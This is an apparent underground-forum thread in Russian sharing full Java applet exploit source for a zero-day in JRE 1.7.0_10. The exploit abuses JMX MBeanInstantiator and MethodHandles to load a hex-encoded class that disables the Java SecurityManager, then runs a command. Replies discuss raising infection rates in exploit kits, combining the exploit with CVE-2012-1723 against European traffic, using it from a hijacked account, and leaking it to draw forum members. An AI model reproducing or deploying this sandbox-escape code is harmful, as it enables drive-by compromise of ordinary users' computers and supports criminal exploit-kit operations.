• XSS.stack #1 – первый литературный журнал от юзеров форума

Java 0day 1.7.0_10

Отслеживать
Gdark

Gdark

(L3) cache
Пользователь
Регистрация
19.07.2009
Сообщения
177
Реакции
0
Бьет все ветки jre 1.7. Пробив в 2-3 раза растет. Может кому надо снять сливки пока. & #34; заменить на "

Код: 
import java.applet.Applet;

import com.sun.jmx.mbeanserver.JmxMBeanServer;

import com.sun.jmx.mbeanserver.JmxMBeanServerBuilder;

import com.sun.jmx.mbeanserver.MBeanInstantiator;

import java.lang.invoke.MethodHandle;

import java.lang.invoke.MethodHandles;

import java.lang.invoke.MethodType;

import java.lang.reflect.Method;

 

 

public byte[] hex2Byte(String paramString)

{

    byte[] arrayOfByte = new byte[paramString.length() / 2];

    for (int i = 0; i < arrayOfByte.length; i++)

    {

      arrayOfByte[i] = (byte)Integer.parseInt(paramString.substring(2 * i, 2 * i + 2), 16);

    }

 

    return arrayOfByte;

 }

public static String ByteArrayWithSecOff = "CAFEBABE0000003200270A000500180A0019001A07001B0A001C001D07001E07001F0700200100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C65010001650100154C6A6176612F6C616E672F457863657074696F6E3B010004746869730100034C423B01000D537461636B4D61705461626C6507001F07001B01000372756E01001428294C6A6176612F6C616E672F4F626A6563743B01000A536F7572636546696C65010006422E6A6176610C000800090700210C002200230100136A6176612F6C616E672F457863657074696F6E0700240C002500260100106A6176612F6C616E672F4F626A656374010001420100276A6176612F73656375726974792F50726976696C65676564457863657074696F6E416374696F6E01001E6A6176612F73656375726974792F416363657373436F6E74726F6C6C657201000C646F50726976696C6567656401003D284C6A6176612F73656375726974792F50726976696C65676564457863657074696F6E416374696F6E3B294C6A6176612F6C616E672F4F626A6563743B0100106A6176612F6C616E672F53797374656D01001273657453656375726974794D616E6167657201001E284C6A6176612F6C616E672F53656375726974794D616E616765723B295600210006000500010007000000020001000800090001000A0000006C000100020000000E2AB700012AB8000257A700044CB1000100040009000C00030003000B000000120004000000080004000B0009000C000D000D000C000000160002000D0000000D000E00010000000E000F001000000011000000100002FF000C00010700120001070013000001001400150001000A0000003A000200010000000C01B80004BB000559B70001B000000002000B0000000A00020000001000040011000C0000000C00010000000C000F0010000000010016000000020017";

 

  public void init()

  {

    try

    {

      

      byte[] arrayOfByte = hex2Byte(ByteArrayWithSecOff);

      JmxMBeanServerBuilder localJmxMBeanServerBuilder = new JmxMBeanServerBuilder();

      JmxMBeanServer localJmxMBeanServer = (JmxMBeanServer)localJmxMBeanServerBuilder.newMBeanServer("", null, null);

      MBeanInstantiator localMBeanInstantiator = localJmxMBeanServer.getMBeanInstantiator();

      ClassLoader a = null;

      Class localClass1 = localMBeanInstantiator.findClass("sun.org.mozilla.javascript.internal.Context", a);

      Class localClass2 = localMBeanInstantiator.findClass("sun.org.mozilla.javascript.internal.GeneratedClassLoader", a);

      MethodHandles.Lookup localLookup = MethodHandles.publicLookup();

      MethodType localMethodType1 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { MethodType.class });

      MethodHandle localMethodHandle1 = localLookup.findVirtual(MethodHandles.Lookup.class, "findConstructor", localMethodType1);

      MethodType localMethodType2 = MethodType.methodType(Void.TYPE);

      MethodHandle localMethodHandle2 = (MethodHandle)localMethodHandle1.invokeWithArguments(new Object[] { localLookup, localClass1, localMethodType2 });

      Object localObject1 = localMethodHandle2.invokeWithArguments(new Object[0]);

      MethodType localMethodType3 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { String.class, MethodType.class });

      MethodHandle localMethodHandle3 = localLookup.findVirtual(MethodHandles.Lookup.class, "findVirtual", localMethodType3);

      MethodType localMethodType4 = MethodType.methodType(localClass2, ClassLoader.class);

      MethodHandle localMethodHandle4 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass1, "createClassLoader", localMethodType4 });

      Object localObject2 = localMethodHandle4.invokeWithArguments(new Object[] { localObject1, null });

      MethodType localMethodType5 = MethodType.methodType(Class.class, String.class, new Class[] { byte[].class });

      MethodHandle localMethodHandle5 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass2,"defineClass", localMethodType5 });

      Class localClass3 = (Class)localMethodHandle5.invokeWithArguments(new Object[] { localObject2, null, arrayOfByte });

      localClass3.newInstance();

 

 

      Runtime.getRuntime().exec("calc.exe");

 

    }   

    catch (Throwable ex) {}

  }

}
 
Gdark, руками снимал защиту или у тебя был вариант не защищеный протекторами или мб тулзы есть какие, а то впринципе не сложно в декомпилерах и dirtyjoe поглядывать но больно это нудное занятие.
 
Gdark, руками снимал защиту или у тебя был вариант не защищеный протекторами или мб тулзы есть какие, а то впринципе не сложно в декомпилерах и dirtyjoe поглядывать но больно это нудное занятие.
только декомпилятором пользовался, остальное сам.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
спрошу за всех) откуда?
 
если верить слухам ситуация следующая
панч имеет бюджет на покупку няшек, которые ему иногда кто то продает
эти няшки ставятся для узкого круга людей, за бешеные деньги в месяц ( 30к если верить слухам )
после того как это дело уплывает в другие связки и пахнет жареным, он добавляет это в блекхол
 
Пожалуйста, обратите внимание, что пользователь заблокирован
код со ссылкой на дамагу подарен кафеину. Посмотрим, насколько прирастут регистрации, и чего вообще из этого получится.
...
Только проверил. Для незарегистрированных, форум говорит что топика нэт. И это печально. И в какой тогда раздел вкусняшки для пиара постить?
 
Пожалуйста, обратите внимание, что пользователь заблокирован
el- вопрос не тривиальный. Появление необфусцированных сорсов в паблике - было вопросом пары дней, поэтому гдарк разрешил выложить сразу, и от имени дамаги.
Сам слив их кафеину - попытка создать очередной приток целевой аудитории. Почему я говорю "целевой", потому что в данном случае мы имеем шанс получить аверов, реверсеров, малварь-хантеров, клиентов сплойт-паков, сплойт-девелоперов, и всех-всех-всех, кто так или иначе касается данной темы. Полянка у всех общая.
Так же, я не считаю, что без этого слива на форуме будет меньше аверов, т.к. если форум будет обладать ценными материалами, то он так или иначе будет представлять для них интерес. Данный слив лишь призван ускорить приток людей, не самого последнего качества кстати (вместо ненавистной школоты, однако).

как-то так.

пс. я понимаю, что место для пиара не совсем подходящее, но лучше (если я не ошибаюсь) пока нет.
 
походу из за текущей реги бОльшой % не могут регнуться и это факт! задумайтесь...

з.ы. зиродеи на дамаге безусловно могут улучшить контингент...
 
На подконтрольном мне угнанном акаунте, где точно уже используется новый сплоент, пробив вырос в 2 раза по предварительным данным. Работает вобщем. (цифры приводить безсмысленно, так как все зависит от множества факторов как успел заметить уважаемый -el https://xss.pro/index.php?topic=23705)
 
При совместном использовании CVE-2012-1723 под 1.6 и этого под 1.7 пробив по европе(UK/NL/CH/DK) примерно удваивается (с 7-8 до 14-16%), +добавляется общий трафф за счет того, что фф бьётся - можно снова допускать до связки.
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх